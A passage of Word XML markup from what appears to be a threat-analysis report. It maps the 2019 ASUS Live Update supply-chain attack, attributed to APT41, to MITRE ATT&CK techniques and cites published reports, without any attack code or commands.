                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA" w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>565</w:t>
            </w:r>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E63DEA" w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Data Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="049C3867" w14:textId="2D287FB2" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="00E63DEA" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="782C842F" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ED7E4D3" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="000003D7" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B726645" w14:textId="04DD2B28" w:rsidR="000003D7" w:rsidRPr="004F11AC" w:rsidRDefault="001E0502" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidR="0006774B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="517ED3F8" w14:textId="24832B45" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="001E0502">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="001E0502">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00C5122C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>]</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001E0502">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attacker manipulates and signs Asus Live Update Tool</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidR="00F800D3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> No specifics </w:t>
            </w:r>
            <w:r w:rsidR="003A03AB">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>found</w:t>
            </w:r>
            <w:r w:rsidR="00F800D3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> about how this is achieved (in terms of techniques. However</w:t>
            </w:r>
            <w:r w:rsidR="009520BF">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00F800D3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> an analysis of the changes made is given in [5]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3648FC88" w14:textId="577FC2AC" w:rsidR="00F800D3" w:rsidRDefault="00F800D3" w:rsidP="001E0502">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Clearly some reconnaissance has been done on targets to work out relevant </w:t>
            </w:r>
            <w:r w:rsidR="00217E1A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">600 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>MAC addresses to scan for. Also access to required digital signatures has been achieved.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BC5BC3A" w14:textId="77777777" w:rsidR="00B86569" w:rsidRDefault="00B86569" w:rsidP="001E0502">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D90EFD1" w14:textId="130C6C15" w:rsidR="00B86569" w:rsidRPr="0074549B" w:rsidRDefault="00B86569" w:rsidP="001E0502">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B86569">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>T1587.002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B86569">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Develop Capabilities: Code Signing Certificates</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> could be recorded here as a support technique but not a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>detectable technique in this context</w:t>
            </w:r>
            <w:r w:rsidR="008F7B25">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1180" w:rsidRPr="00B857D7" w14:paraId="2291A94C" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="357D54CA" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="242A8E65" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FA57756" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59DFCC06" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A2DB57" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77C59EA6" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736444DB" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68B27DD1" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="00C5122C" w:rsidRDefault="00EF1180" w:rsidP="001E0502">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EF1180" w:rsidRPr="00B857D7" w14:paraId="281EEAA6" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C3532A3" w14:textId="35BAEA65" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FE49EEA" w14:textId="2082E703" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0040 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20B128B0" w14:textId="58E527E5" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1565 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Data Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4772ABD3" w14:textId="6A3852CE" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="153686DC" w14:textId="77777777" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67E06B27" w14:textId="0DCDA824" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="277BB114" w14:textId="25B837DC" w:rsidR="00EF1180" w:rsidRPr="004F11AC" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidRPr="004F11AC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>-TMA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F45140C" w14:textId="7FC73D29" w:rsidR="00EF1180" w:rsidRPr="00C5122C" w:rsidRDefault="00EF1180" w:rsidP="00EF1180">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Added to tidy Markov</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="93"/>
    </w:tbl>
    <w:p w14:paraId="1A7B074E" w14:textId="77777777" w:rsidR="000003D7" w:rsidRPr="0077286F" w:rsidRDefault="000003D7" w:rsidP="000003D7"/>
    <w:p w14:paraId="7CD3FD32" w14:textId="3CB439C8" w:rsidR="000003D7" w:rsidRDefault="000003D7" w:rsidP="000003D7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r w:rsidR="00911C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>[Report] Double Dragon: APT41, a Dual Espionage and Cyber Crime Operation (fireeye.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005A6AAC">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[20</w:t>
      </w:r>
      <w:r w:rsidR="00911C28">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r w:rsidRPr="00227A6C">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69197B34" w14:textId="0D391F3F" w:rsidR="0030336F" w:rsidRDefault="0030336F" w:rsidP="000003D7">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">[2] </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Justice Department charges five Chinese members of APT41 over cyberattacks on US companies | TechCrunch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2020] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Google Search </w:t>
      </w:r>
      <w:r w:rsidR="005A0FEB">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>APT41 Asus Attack</w:t>
      </w:r>
      <w:r w:rsidR="005A0FEB">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A14F290" w14:textId="1C062177" w:rsidR="003143E4" w:rsidRDefault="003143E4" w:rsidP="000003D7">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0030336F">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:hyperlink r:id="rId112" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">Hackers dropped a secret backdoor in </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Asus’</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> update software | TechCrunch</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( via</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0030336F">
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323E907F" w14:textId="4113FBD9" w:rsidR="005A0FEB" w:rsidRDefault="005A0FEB" w:rsidP="000003D7">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId113" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ASUS Software Updates Used for Supply Chain Attacks | Symantec Enterprise Blogs (security.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] (via Google Search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>asus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>suppply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> chain attack</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A4DD47" w14:textId="5C5D58AA" w:rsidR="00D77A9F" w:rsidRDefault="00704555">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId114" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Inside the ASUS Supply Chain Attack (morphisec.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> [2019] (via Google Search “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>asus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t>suppply</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005A0FEB">
        <w:t xml:space="preserve"> chain attack</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
      <w:r w:rsidR="00D77A9F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E5506E" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc153480875"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Double Dragon APT41, a dual espionage and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyber crime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> operation – ASUS Attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="2F4B5FCF" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRDefault="00D77A9F" w:rsidP="00D77A9F">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D77A9F" w:rsidRPr="002D1D50" w14:paraId="12FAFF7A" w14:textId="77777777" w:rsidTr="00E20C37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79A750FD" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="95" w:name="OLE_LINK8"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22DAF8BA" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="002D1D50" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4584CEB6" w14:textId="77777777" w:rsidR="00D77A9F" w:rsidRPr="00387DCC" w:rsidRDefault="00D77A9F" w:rsidP="00E20C37">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
